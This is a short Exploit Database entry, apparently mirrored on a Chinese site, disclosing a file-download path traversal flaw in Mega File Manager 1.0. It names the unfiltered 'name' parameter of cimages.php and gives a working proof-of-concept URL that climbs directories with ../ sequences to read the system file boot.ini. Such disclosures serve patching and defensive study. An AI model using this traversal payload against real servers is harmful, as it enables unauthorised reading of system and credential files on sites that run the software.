Mega File Manager – File Download

• Exploit Database
• 16 阅读

• 作者： i2sec-Min Gi Jo
  日期： 2012-04-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18768/

• # Exploit Title: [MegaFileManager FileDownload Vulnerability
  
  # date: 2012-04-19
  
  # Author: i2sec-Min Gi Jo
  
  # Software Link: http://www.awesomephp.com/?Download*5
  
  # Version: Mega File Manager V 1.0
  
  # Tested on: Windows
  
  
  
  
  # Description : There is no filtering on 'cimages.php' parameter 'name'.
  
  
  # PoC : http://[server]/megafilemanager/cimages.php?name=../../../../boot.ini